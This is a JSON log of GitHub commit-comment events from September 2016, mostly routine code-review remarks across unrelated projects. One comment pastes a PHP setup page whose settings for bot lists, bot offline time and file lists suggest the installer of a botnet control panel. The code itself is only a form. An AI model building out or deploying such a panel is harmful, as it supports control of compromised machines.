{"id":"4646345053","type":"CommitCommentEvent","actor":{"login":"gordielachance"},"repo":{"name":"lrusak/plugin.audio.subsonic"},"payload":{"comment":{"id":19249836,"position":null,"line":null,"path":null,"commit_id":"ad830b67ddf88926e12f75952e341d8d842cdb27","created_at":"2016-09-30T23:17:39Z","updated_at":"2016-09-30T23:17:39Z","body":"Hi lrusak !  \r\n\r\nI saw you were forking the Subsonic addon for KODI, which is great since it wasn't working anymore.  \r\nI have myself worked a little on it recently.\r\nIt's my first time with Python but I managed to make some improvements, especially in the menu structure and to browse albums (more options + paging).\r\n\r\nOnce I saw this, I cloned some of your commits in my own repo (had to do manually since I don't know if there is a way to do it with Github), nice ones !\r\n\r\nSo your modifications (except '[that one](https://github.com/lrusak/plugin.audio.subsonic/commit/6c48f72e2f44fce51a6ec9c96562fd157cc3ec59)' which causes errors in my KODI) are already synced in my repo.\r\n\r\nI was wondering if you would agree to fork my own repo instead of working on the original version, so my modifications would be included in your fork.  \r\nMy goal was only to make the plugin work again and to add some basic features, but I will probably not work on this anymore as I'm just a newbie in Python.\r\n\r\nWhat do you think of this ?  \r\n\r\nHere's my own fork (with some of your edits) : https://github.com/gordielachance/plugin.audio.subsonic\r\n\r\nThanks !"}},"created_at":"2016-09-30T23:17:39Z"}
{"id":"4646349612","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19249938,"position":155,"line":155,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-30T23:19:14Z","updated_at":"2016-09-30T23:19:14Z","body":"Gotcha. And just to clarify, my original func InOrder() is what you mean by ascending order (because it would return values from smallest to biggest), right? Descending would just be the reverse of that?\r\n"}},"created_at":"2016-09-30T23:19:14Z"}
{"id":"4646352678","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19250013,"position":155,"line":155,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-30T23:20:22Z","updated_at":"2016-09-30T23:20:22Z","body":"Yep."}},"created_at":"2016-09-30T23:20:22Z"}
{"id":"4646352890","type":"CommitCommentEvent","actor":{"login":"csnover"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19250019,"position":null,"line":null,"path":null,"commit_id":"437f1d1cd154fd9b1817f2bdb0fc3f89655c1722","created_at":"2016-09-30T23:20:27Z","updated_at":"2016-09-30T23:20:27Z","body":"These changes were not missed. I removed them intentionally."}},"created_at":"2016-09-30T23:20:27Z"}
{"id":"4646356676","type":"CommitCommentEvent","actor":{"login":"danielcompton"},"repo":{"name":"clojars/clojars-server-config"},"payload":{"comment":{"id":19250111,"position":1,"line":1,"path":"roles/clojars/templates/logrotate/nginx.j2","commit_id":"5b47cde6354254de20650cb9d3006fd01f1a9ebf","created_at":"2016-09-30T23:21:49Z","updated_at":"2016-09-30T23:21:49Z","body":"It might pay to add `# {{ ansible_managed }}` to the header. "}},"created_at":"2016-09-30T23:21:49Z"}
{"id":"4646357750","type":"CommitCommentEvent","actor":{"login":"josegallo"},"repo":{"name":"udacity/create-your-own-adventure"},"payload":{"comment":{"id":19250137,"position":null,"line":null,"path":null,"commit_id":"4657cc3112418e58cdce21fd17262eb7f70387ff","created_at":"2016-09-30T23:22:14Z","updated_at":"2016-09-30T23:22:14Z","body":"remenber invoke @casey-collab :)"}},"created_at":"2016-09-30T23:22:14Z"}
{"id":"4646360300","type":"CommitCommentEvent","actor":{"login":"josegallo"},"repo":{"name":"udacity/create-your-own-adventure"},"payload":{"comment":{"id":19250205,"position":null,"line":null,"path":null,"commit_id":"a65e87224a02c704f2eef017443a8edf8a06ddff","created_at":"2016-09-30T23:23:08Z","updated_at":"2016-09-30T23:23:08Z","body":"@casey-collab "}},"created_at":"2016-09-30T23:23:08Z"}
{"id":"4646374192","type":"CommitCommentEvent","actor":{"login":"shawnt96"},"repo":{"name":"shawnt96/resume"},"payload":{"comment":{"id":19250281,"position":1,"line":1,"path":"README.md","commit_id":"3546b05d39ed5bfb5abe67c60d672f7c2ed9ac93","created_at":"2016-09-30T23:28:09Z","updated_at":"2016-09-30T23:28:09Z","body":"shawn hello\r\n"}},"created_at":"2016-09-30T23:28:09Z"}
{"id":"4646374345","type":"CommitCommentEvent","actor":{"login":"shawnt96"},"repo":{"name":"shawnt96/resume"},"payload":{"comment":{"id":19250282,"position":null,"line":null,"path":null,"commit_id":"3546b05d39ed5bfb5abe67c60d672f7c2ed9ac93","created_at":"2016-09-30T23:28:12Z","updated_at":"2016-09-30T23:28:12Z","body":"first time"}},"created_at":"2016-09-30T23:28:12Z"}
{"id":"4646374713","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19250284,"position":null,"line":null,"path":null,"commit_id":"f1bc3e6bd068baea96fd89e20570721a7385891c","created_at":"2016-09-30T23:28:21Z","updated_at":"2016-09-30T23:28:21Z","body":"You can write it up, but dont implement it untill after xbee test."}},"created_at":"2016-09-30T23:28:21Z"}
{"id":"4646377258","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"catalindumitrache76/lab1-git-race"},"payload":{"comment":{"id":19250290,"position":null,"line":null,"path":null,"commit_id":"f93a8142c1b2f3e8c84f2dd0324c70bda14b8d7c","created_at":"2016-09-30T23:29:14Z","updated_at":"2016-09-30T23:29:14Z","body":"Rather than add // comments, you should use: \r\n\r\n    /**\r\n     *\r\n     */\r\n\r\nbefore the annotations and explain the meaning of the class or field affected and the impact of the annotation on it."}},"created_at":"2016-09-30T23:29:14Z"}
{"id":"4646380709","type":"CommitCommentEvent","actor":{"login":"Mr-DaveDev"},"repo":{"name":"jogu/motion"},"payload":{"comment":{"id":19250298,"position":62,"line":246,"path":"ffmpeg.c","commit_id":"780bafeb23b31b824b48f970fdc158efc271ed33","created_at":"2016-09-30T23:30:21Z","updated_at":"2016-09-30T23:30:21Z","body":"We will need to revise these to use the regular <code>MOTION_LOG </code>."}},"created_at":"2016-09-30T23:30:21Z"}
{"id":"4646381251","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"M3tax/lab1-git-race"},"payload":{"comment":{"id":19250302,"position":null,"line":null,"path":null,"commit_id":"7aa8539c84a002c306d3557678e90fc59e48a99d","created_at":"2016-09-30T23:30:31Z","updated_at":"2016-09-30T23:30:31Z","body":":+1:"}},"created_at":"2016-09-30T23:30:31Z"}
{"id":"4646383230","type":"CommitCommentEvent","actor":{"login":"shawnt96"},"repo":{"name":"shawnt96/resume"},"payload":{"comment":{"id":19250312,"position":1,"line":1,"path":"README.md","commit_id":"3546b05d39ed5bfb5abe67c60d672f7c2ed9ac93","created_at":"2016-09-30T23:31:16Z","updated_at":"2016-09-30T23:31:16Z","body":"kdsd\r\n"}},"created_at":"2016-09-30T23:31:16Z"}
{"id":"4646386667","type":"CommitCommentEvent","actor":{"login":"gabriel-os"},"repo":{"name":"rillis/AboutMe"},"payload":{"comment":{"id":19250318,"position":5,"line":67,"path":"css/style.css","commit_id":"c552b1617618e60214d992958a225b23d46b3924","created_at":"2016-09-30T23:32:37Z","updated_at":"2016-09-30T23:32:37Z","body":"Acho que tem um \"**;**\" a mais ai não?"}},"created_at":"2016-09-30T23:32:37Z"}
{"id":"4646387933","type":"CommitCommentEvent","actor":{"login":"woden234"},"repo":{"name":"xxg1413/python"},"payload":{"comment":{"id":19250320,"position":null,"line":null,"path":null,"commit_id":"cc1d99ff084b91c342a1ccd8d2e12e45d0450bbe","created_at":"2016-09-30T23:33:06Z","updated_at":"2016-09-30T23:33:06Z","body":"chinese is good"}},"created_at":"2016-09-30T23:33:06Z"}
{"id":"4646389815","type":"CommitCommentEvent","actor":{"login":"simplesmiler"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19250326,"position":null,"line":null,"path":null,"commit_id":"e6d224c3c5ca3ff6a365326ba615d116764b68f2","created_at":"2016-09-30T23:33:49Z","updated_at":"2016-09-30T23:33:49Z","body":"@timothyclemansinsea if you used 1.x before, then update your CDN link to point to a specific version (the latest is v1.0.28)."}},"created_at":"2016-09-30T23:33:49Z"}
{"id":"4646391736","type":"CommitCommentEvent","actor":{"login":"MessyMix"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19250331,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T23:34:36Z","updated_at":"2016-09-30T23:34:36Z","body":"Damn. Well played, and in that case I guess it doesn't really matter at all anyways 😛 "}},"created_at":"2016-09-30T23:34:36Z"}
{"id":"4646402391","type":"CommitCommentEvent","actor":{"login":"eddy1984"},"repo":{"name":"eddy1984/test"},"payload":{"comment":{"id":19250367,"position":1,"line":1,"path":".gitattributes","commit_id":"e4adfae516d14e5b1ff070be9623523cfc0dee5e","created_at":"2016-09-30T23:38:43Z","updated_at":"2016-09-30T23:38:43Z","body":"<?php\r\n  if (file_exists(\"../reg.php\")) {\r\n    include(\"../reg.php\");\r\n\tif ($validDomain == \"false\") {\r\n\t  die(\"Unauthorized Domain: Please contact support.\");\r\n\t}\r\n  } else {\r\n    die(\"Missing Files: Please contact support.\");\r\n  }\r\n  \r\nif (file_exists(\"../config.php\")) {\r\n  header('Location: ../control.php');\r\n  die();\r\n}\r\n?>\r\n<!DOCTYPE html>\r\n<html>\r\n  <head>\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n  \r\n    <title>Setup: Step 1</title>\r\n\r\n    <link href=\"../assets/css/bootstrap.css\" rel=\"stylesheet\" media=\"screen\">\r\n\t<link href=\"../assets/css/bootstrap-glyphicons.css\" rel=\"stylesheet\" media=\"screen\">\r\n\t\r\n\t<script src=\"http://code.jquery.com/jquery.js\"></script>\r\n\t<script src=\"../assets/js/jquery.tablesorter.min.js\"></script>\r\n\t<script src=\"../assets/js/jquery.tablesorter.widgets.min.js\"></script>\r\n    <style type=\"text/css\">\r\n\t  body {\r\n\t    background-image:url('../assets/img/login_bg.png');\r\n\t  }\r\n\t  .main {\r\n        width: 1350px;\r\n        height: 600px;\r\n\t\t\r\n\t\tbackground-color: #ffffff;\r\n        border: 1px solid #999999;\r\n        border: 1px solid rgba(0, 0, 0, 0.2);\r\n        border-radius: 6px;\r\n        outline: none;\r\n        -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);\r\n        box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);\r\n\r\n        position: absolute;\r\n        top: 0;\r\n        bottom: 0;\r\n        left: 0;\r\n        right: 0;\r\n\r\n        margin: auto;\r\n\t\t\r\n\t\tpadding: 15px 15px 15px 15px;\r\n      }\r\n\t  .logo {\r\n\t\tmargin: 0 0 0 -140px;\r\n\t\theight: 532px;\r\n\t\twidth: 200px;\r\n\t\tz-index:-1;\r\n\t\tposition: absolute;\r\n\t  }\r\n\t</style>\r\n  </head>\r\n  <body>\r\n    <div class=\"main\">\r\n\t  <div class=\"row\">\r\n\t   <form class=\"form-horizontal\" method=\"post\" action=\"createconfig.php\">\r\n\t    <div class=\"col-lg-6\">\r\n\t\t  <div class=\"row\"><div class=\"col-lg-4\"><h1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Step 1</h1></div><div class=\"col-lg-8\" style=\"margin-top: 35px;\"><p>Everything can be Edited Later</p></div></div>\r\n\t\t  <hr />\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"dbusername\" class=\"col-lg-4 control-label\">Database Username</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"text\" class=\"form-control\" id=\"dbusername\" name=\"dbusername\" placeholder=\"Database Username\">\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"dbpassword\" class=\"col-lg-4 control-label\">Database Password</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"text\" class=\"form-control\" id=\"dbpassword\" name=\"dbpassword\" placeholder=\"Database Password\">\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"dbhost\" class=\"col-lg-4 control-label\">Database Host</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"text\" class=\"form-control\" id=\"dbhost\" name=\"dbhost\" placeholder=\"Database Hostname/IP\">\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"dbname\" class=\"col-lg-4 control-label\">Database Name</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"text\" class=\"form-control\" id=\"dbname\" name=\"dbname\" placeholder=\"Database Name\">\r\n              </div>\r\n            </div>\r\n\t\t\t<hr />\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"devicetablerefr\" class=\"col-lg-5 control-label\">Bot List Refresh Time (Sec)</label>\r\n              <div class=\"col-lg-7\">\r\n                <input type=\"number\" class=\"form-control\" id=\"devicetablerefr\" name=\"devicetablerefr\" placeholder=\"Time Between Bot List Refreshes. Suggested: 10\">\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"filetablerefr\" class=\"col-lg-5 control-label\">File List Refresh Time (Sec)</label>\r\n              <div class=\"col-lg-7\">\r\n                <input type=\"number\" class=\"form-control\" id=\"filetablerefr\" name=\"filetablerefr\" placeholder=\"Time Between File List Refreshes. Suggested: 10\">\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"historyboxrefr\" class=\"col-lg-5 control-label\">Message Box Refresh Time (Sec)</label>\r\n              <div class=\"col-lg-7\">\r\n                <input type=\"number\" class=\"form-control\" id=\"historyboxrefr\" name=\"historyboxrefr\" placeholder=\"Time Between Message Box Refreshes. Suggested: <5\">\r\n              </div>\r\n            </div>\r\n\t\t</div>\r\n\t\t<div class=\"col-lg-6\">\r\n\t\t  <div style=\"margin: 0px 60px 0px 0px;\">\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"username\" class=\"col-lg-4 control-label\">Username</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"text\" class=\"form-control\" id=\"username\" name=\"username\" placeholder=\"Username Used to Login to the Panel\">\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"password\" class=\"col-lg-4 control-label\">Password</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"password\" class=\"form-control\" id=\"password\" name=\"password\" placeholder=\"Password Used to Login to the Panel\">\r\n              </div>\r\n            </div>\r\n\t\t\t<hr />\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"botoffline\" class=\"col-lg-4 control-label\">Bot Offline Time (Min)</label>\r\n              <div class=\"col-lg-8\">\r\n                <input type=\"number\" class=\"form-control\" id=\"botoffline\" name=\"botoffline\" placeholder=\"Time Before Bot is Considered 'Offline'\">\r\n              </div>\r\n            </div>\r\n\t\t\t<hr />\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"timezone\" class=\"col-lg-4 control-label\">TimeZone</label>\r\n              <div class=\"col-lg-8\">\r\n                <select class=\"form-control\" id=\"timezone\" name=\"timezone\">\r\n<option value=\"Pacific/Midway\">(GMT-11:00) Midway Island, Samoa</option>\r\n<option value=\"America/Adak\">(GMT-10:00) Hawaii-Aleutian</option>\r\n<option value=\"Etc/GMT+10\">(GMT-10:00) Hawaii</option>\r\n<option value=\"Pacific/Marquesas\">(GMT-09:30) Marquesas Islands</option>\r\n<option value=\"Pacific/Gambier\">(GMT-09:00) Gambier Islands</option>\r\n<option value=\"America/Anchorage\">(GMT-09:00) Alaska</option>\r\n<option value=\"America/Ensenada\">(GMT-08:00) Tijuana, Baja California</option>\r\n<option value=\"Etc/GMT+8\">(GMT-08:00) Pitcairn Islands</option>\r\n<option value=\"America/Los_Angeles\">(GMT-08:00) Pacific Time (US & Canada)</option>\r\n<option value=\"America/Denver\">(GMT-07:00) Mountain Time (US & Canada)</option>\r\n<option value=\"America/Chihuahua\">(GMT-07:00) Chihuahua, La Paz, Mazatlan</option>\r\n<option value=\"America/Dawson_Creek\">(GMT-07:00) Arizona</option>\r\n<option value=\"America/Belize\">(GMT-06:00) Saskatchewan, Central America</option>\r\n<option value=\"America/Cancun\">(GMT-06:00) Guadalajara, Mexico City, Monterrey</option>\r\n<option value=\"Chile/EasterIsland\">(GMT-06:00) Easter Island</option>\r\n<option value=\"America/Chicago\">(GMT-06:00) Central Time (US & Canada)</option>\r\n<option value=\"America/New_York\">(GMT-05:00) Eastern Time (US & Canada)</option>\r\n<option value=\"America/Havana\">(GMT-05:00) Cuba</option>\r\n<option value=\"America/Bogota\">(GMT-05:00) Bogota, Lima, Quito, Rio Branco</option>\r\n<option value=\"America/Caracas\">(GMT-04:30) Caracas</option>\r\n<option value=\"America/Santiago\">(GMT-04:00) Santiago</option>\r\n<option value=\"America/La_Paz\">(GMT-04:00) La Paz</option>\r\n<option value=\"Atlantic/Stanley\">(GMT-04:00) Faukland Islands</option>\r\n<option value=\"America/Campo_Grande\">(GMT-04:00) Brazil</option>\r\n<option value=\"America/Goose_Bay\">(GMT-04:00) Atlantic Time (Goose Bay)</option>\r\n<option value=\"America/Glace_Bay\">(GMT-04:00) Atlantic Time (Canada)</option>\r\n<option value=\"America/St_Johns\">(GMT-03:30) Newfoundland</option>\r\n<option value=\"America/Araguaina\">(GMT-03:00) UTC-3</option>\r\n<option value=\"America/Montevideo\">(GMT-03:00) Montevideo</option>\r\n<option value=\"America/Miquelon\">(GMT-03:00) Miquelon, St. Pierre</option>\r\n<option value=\"America/Godthab\">(GMT-03:00) Greenland</option>\r\n<option value=\"America/Argentina/Buenos_Aires\">(GMT-03:00) Buenos Aires</option>\r\n<option value=\"America/Sao_Paulo\">(GMT-03:00) Brasilia</option>\r\n<option value=\"America/Noronha\">(GMT-02:00) Mid-Atlantic</option>\r\n<option value=\"Atlantic/Cape_Verde\">(GMT-01:00) Cape Verde Is.</option>\r\n<option value=\"Atlantic/Azores\">(GMT-01:00) Azores</option>\r\n<option value=\"Europe/Belfast\">(GMT) Greenwich Mean Time : Belfast</option>\r\n<option value=\"Europe/Dublin\">(GMT) Greenwich Mean Time : Dublin</option>\r\n<option value=\"Europe/Lisbon\">(GMT) Greenwich Mean Time : Lisbon</option>\r\n<option value=\"Europe/London\">(GMT) Greenwich Mean Time : London</option>\r\n<option value=\"Africa/Abidjan\">(GMT) Monrovia, Reykjavik</option>\r\n<option value=\"Europe/Amsterdam\">(GMT+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna</option>\r\n<option value=\"Europe/Belgrade\">(GMT+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague</option>\r\n<option value=\"Europe/Brussels\">(GMT+01:00) Brussels, Copenhagen, Madrid, Paris</option>\r\n<option value=\"Africa/Algiers\">(GMT+01:00) West Central Africa</option>\r\n<option value=\"Africa/Windhoek\">(GMT+01:00) Windhoek</option>\r\n<option value=\"Asia/Beirut\">(GMT+02:00) Beirut</option>\r\n<option value=\"Africa/Cairo\">(GMT+02:00) Cairo</option>\r\n<option value=\"Asia/Gaza\">(GMT+02:00) Gaza</option>\r\n<option value=\"Africa/Blantyre\">(GMT+02:00) Harare, Pretoria</option>\r\n<option value=\"Asia/Jerusalem\">(GMT+02:00) Jerusalem</option>\r\n<option value=\"Europe/Minsk\">(GMT+02:00) Minsk</option>\r\n<option value=\"Asia/Damascus\">(GMT+02:00) Syria</option>\r\n<option value=\"Europe/Moscow\">(GMT+03:00) Moscow, St. Petersburg, Volgograd</option>\r\n<option value=\"Africa/Addis_Ababa\">(GMT+03:00) Nairobi</option>\r\n<option value=\"Asia/Tehran\">(GMT+03:30) Tehran</option>\r\n<option value=\"Asia/Dubai\">(GMT+04:00) Abu Dhabi, Muscat</option>\r\n<option value=\"Asia/Yerevan\">(GMT+04:00) Yerevan</option>\r\n<option value=\"Asia/Kabul\">(GMT+04:30) Kabul</option>\r\n<option value=\"Asia/Yekaterinburg\">(GMT+05:00) Ekaterinburg</option>\r\n<option value=\"Asia/Tashkent\">(GMT+05:00) Tashkent</option>\r\n<option value=\"Asia/Kolkata\">(GMT+05:30) Chennai, Kolkata, Mumbai, New Delhi</option>\r\n<option value=\"Asia/Katmandu\">(GMT+05:45) Kathmandu</option>\r\n<option value=\"Asia/Dhaka\">(GMT+06:00) Astana, Dhaka</option>\r\n<option value=\"Asia/Novosibirsk\">(GMT+06:00) Novosibirsk</option>\r\n<option value=\"Asia/Rangoon\">(GMT+06:30) Yangon (Rangoon)</option>\r\n<option value=\"Asia/Bangkok\">(GMT+07:00) Bangkok, Hanoi, Jakarta</option>\r\n<option value=\"Asia/Krasnoyarsk\">(GMT+07:00) Krasnoyarsk</option>\r\n<option value=\"Asia/Hong_Kong\">(GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi</option>\r\n<option value=\"Asia/Irkutsk\">(GMT+08:00) Irkutsk, Ulaan Bataar</option>\r\n<option value=\"Australia/Perth\">(GMT+08:00) Perth</option>\r\n<option value=\"Australia/Eucla\">(GMT+08:45) Eucla</option>\r\n<option value=\"Asia/Tokyo\">(GMT+09:00) Osaka, Sapporo, Tokyo</option>\r\n<option value=\"Asia/Seoul\">(GMT+09:00) Seoul</option>\r\n<option value=\"Asia/Yakutsk\">(GMT+09:00) Yakutsk</option>\r\n<option value=\"Australia/Adelaide\">(GMT+09:30) Adelaide</option>\r\n<option value=\"Australia/Darwin\">(GMT+09:30) Darwin</option>\r\n<option value=\"Australia/Brisbane\">(GMT+10:00) Brisbane</option>\r\n<option value=\"Australia/Hobart\">(GMT+10:00) Hobart</option>\r\n<option value=\"Asia/Vladivostok\">(GMT+10:00) Vladivostok</option>\r\n<option value=\"Australia/Lord_Howe\">(GMT+10:30) Lord Howe Island</option>\r\n<option value=\"Etc/GMT-11\">(GMT+11:00) Solomon Is., New Caledonia</option>\r\n<option value=\"Asia/Magadan\">(GMT+11:00) Magadan</option>\r\n<option value=\"Pacific/Norfolk\">(GMT+11:30) Norfolk Island</option>\r\n<option value=\"Asia/Anadyr\">(GMT+12:00) Anadyr, Kamchatka</option>\r\n<option value=\"Pacific/Auckland\">(GMT+12:00) Auckland, Wellington</option>\r\n<option value=\"Etc/GMT-12\">(GMT+12:00) Fiji, Kamchatka, Marshall Is.</option>\r\n<option value=\"Pacific/Chatham\">(GMT+12:45) Chatham Islands</option>\r\n<option value=\"Pacific/Tongatapu\">(GMT+13:00) Nuku'alofa</option>\r\n<option value=\"Pacific/Kiritimati\">(GMT+14:00) Kiritimati</option>\r\n\t\t\t\t</select>\r\n              </div>\r\n            </div>\r\n\t\t\t<hr />\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"messageboxscroll\" class=\"col-lg-5 control-label\">Auto Scroll Message Box</label>\r\n              <div class=\"col-lg-7\">\r\n                <select class=\"form-control\" id=\"messageboxscroll\" name=\"messageboxscroll\">\r\n\t\t\t\t  <option>Yes</option>\r\n                  <option>No</option>\r\n\t\t\t\t</select>\r\n              </div>\r\n            </div>\r\n\t\t    <div class=\"form-group\">\r\n              <label for=\"postboxsize\" class=\"col-lg-5 control-label\">Message Box Font Size</label>\r\n              <div class=\"col-lg-7\">\r\n                <input type=\"number\" class=\"form-control\" id=\"postboxsize\" name=\"postboxsize\" placeholder=\"Suggested: 10-12\">\r\n              </div>\r\n            </div>\r\n\t\t\t<br />\r\n\t\t\t<button type=\"submit\" class=\"btn btn-success btn-block\">Continue</button>\r\n\t\t  </div>\r\n\t\t</div>\r\n\t  </form>\r\n\t</div>\r\n  </body>\r\n</html>"}},"created_at":"2016-09-30T23:38:43Z"}
{"id":"4646403791","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19250368,"position":null,"line":null,"path":null,"commit_id":"f1bc3e6bd068baea96fd89e20570721a7385891c","created_at":"2016-09-30T23:39:16Z","updated_at":"2016-09-30T23:39:16Z","body":"CSharp Xbee stuff isn't up yet. I'll finish that tonight."}},"created_at":"2016-09-30T23:39:16Z"}
{"id":"4646406228","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19250376,"position":null,"line":null,"path":null,"commit_id":"f1bc3e6bd068baea96fd89e20570721a7385891c","created_at":"2016-09-30T23:40:17Z","updated_at":"2016-09-30T23:40:17Z","body":"Also, you never told me when we get to test the xbees."}},"created_at":"2016-09-30T23:40:17Z"}
{"id":"4646406893","type":"CommitCommentEvent","actor":{"login":"AlexandyZ"},"repo":{"name":"badukboy/starter-routes"},"payload":{"comment":{"id":19250377,"position":null,"line":null,"path":null,"commit_id":"c80856d0241891601444c1daca08875b5051fbb0","created_at":"2016-09-30T23:40:31Z","updated_at":"2016-09-30T23:40:31Z","body":"What did u do for this commit?"}},"created_at":"2016-09-30T23:40:31Z"}
{"id":"4646408535","type":"CommitCommentEvent","actor":{"login":"ClaytonSmith"},"repo":{"name":"JesseMaeder/rummy"},"payload":{"comment":{"id":19250383,"position":null,"line":null,"path":null,"commit_id":"f936212da23e36291bee15bd2359468ac2b7634d","created_at":"2016-09-30T23:41:11Z","updated_at":"2016-09-30T23:41:11Z","body":"👍 "}},"created_at":"2016-09-30T23:41:11Z"}
{"id":"4646410805","type":"CommitCommentEvent","actor":{"login":"AlexandyZ"},"repo":{"name":"badukboy/starter-routes"},"payload":{"comment":{"id":19250386,"position":null,"line":null,"path":null,"commit_id":"172a4c7dad553ad38a64c1a0f3d3ef7d4c4e408d","created_at":"2016-09-30T23:42:05Z","updated_at":"2016-09-30T23:42:05Z","body":"Plz don't commit this kind of change!!! U should make sure it's necessary for every commits."}},"created_at":"2016-09-30T23:42:05Z"}
{"id":"4646412986","type":"CommitCommentEvent","actor":{"login":"AlexandyZ"},"repo":{"name":"badukboy/starter-routes"},"payload":{"comment":{"id":19250395,"position":null,"line":null,"path":null,"commit_id":"8e4d0d9ca7ebfc29b5c3bbdb3d0a8554ffec000c","created_at":"2016-09-30T23:42:56Z","updated_at":"2016-09-30T23:42:56Z","body":"No meaning commit."}},"created_at":"2016-09-30T23:42:56Z"}
{"id":"4646414596","type":"CommitCommentEvent","actor":{"login":"AlexandyZ"},"repo":{"name":"badukboy/starter-routes"},"payload":{"comment":{"id":19250402,"position":null,"line":null,"path":null,"commit_id":"39100b9d3b12801f2aa7ae4dc6af0f2692af829f","created_at":"2016-09-30T23:43:29Z","updated_at":"2016-09-30T23:43:29Z","body":"No meaning commit."}},"created_at":"2016-09-30T23:43:29Z"}
{"id":"4646418833","type":"CommitCommentEvent","actor":{"login":"AlexandyZ"},"repo":{"name":"badukboy/starter-routes"},"payload":{"comment":{"id":19250416,"position":null,"line":null,"path":null,"commit_id":"b026e222a7b1fa7b5f88ff33b683473fe032c556","created_at":"2016-09-30T23:45:14Z","updated_at":"2016-09-30T23:45:14Z","body":"Plz explain ur commit changes in project.property file."}},"created_at":"2016-09-30T23:45:14Z"}
{"id":"4646419068","type":"CommitCommentEvent","actor":{"login":"mandric"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19250417,"position":null,"line":null,"path":null,"commit_id":"d76371808d9c79f0a973fba1fe8c0c20639a87f2","created_at":"2016-09-30T23:45:19Z","updated_at":"2016-09-30T23:45:19Z","body":"In contact-schema.js I'm not so keen about adding an `isPlace` property to the schema since it's only being used internally?  Also would like to see a PLACE_HIERARCHY array or appropriate structure defined that is used instead of a comment.   Use an array where ordering is important and if the hierarchy is only relevant to getPlaceTypes then it should only be used there.  Also it might not be good to introduce a new expectation on `getSchema` that never existed? \r\n\r\nSo I'd rather see something like:\r\n\r\n\r\n```\r\nPLACE_HIERARCHY = ['district_hospital', 'health_center', 'clinic'];\r\n\r\n/* \r\n *  Return place types in proper hierarchical order.  \r\n *  Throws exception if hierarchy and schema don't match.\r\n */\r\ngetPlaceTypes: function() {\r\n  var schema = getSchema();\r\n  return _.map(PLACE_HIERARCHY, function(type) {\r\n    return schema[type];\r\n  });\r\n};\r\n```"}},"created_at":"2016-09-30T23:45:19Z"}
{"id":"4646425854","type":"CommitCommentEvent","actor":{"login":"mandric"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19250439,"position":null,"line":null,"path":null,"commit_id":"d76371808d9c79f0a973fba1fe8c0c20639a87f2","created_at":"2016-09-30T23:48:04Z","updated_at":"2016-09-30T23:48:04Z","body":"Nice refactor!"}},"created_at":"2016-09-30T23:48:04Z"}
{"id":"4646440369","type":"CommitCommentEvent","actor":{"login":"thallgren"},"repo":{"name":"Yelp/puppet"},"payload":{"comment":{"id":19250467,"position":82,"line":82,"path":"lib/puppet/pops/lookup/interpolation.rb","commit_id":"087312f99e1e45733bec09f5a61f9fa7f1b70874","created_at":"2016-09-30T23:54:17Z","updated_at":"2016-09-30T23:54:17Z","body":"This logic is intentional and the behavior is the same as in Hiera. I agree that it would make sense to raise an error instead if strict was on. Can you please file a ticket for that at https://tickets.puppetlabs.com/browse/PUP ?"}},"created_at":"2016-09-30T23:54:17Z"}
{"id":"4641195944","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19235696,"position":60,"line":122,"path":"src/com/dotcms/rest/api/v1/index/ESIndexResource.java","commit_id":"106caa240571eb63b9dd3eb43662ff9392f144e7","created_at":"2016-09-30T03:00:53Z","updated_at":"2016-09-30T03:00:53Z","body":"I think this method can be deleted and if still used, replace by the helper "}},"created_at":"2016-09-30T03:00:53Z"}
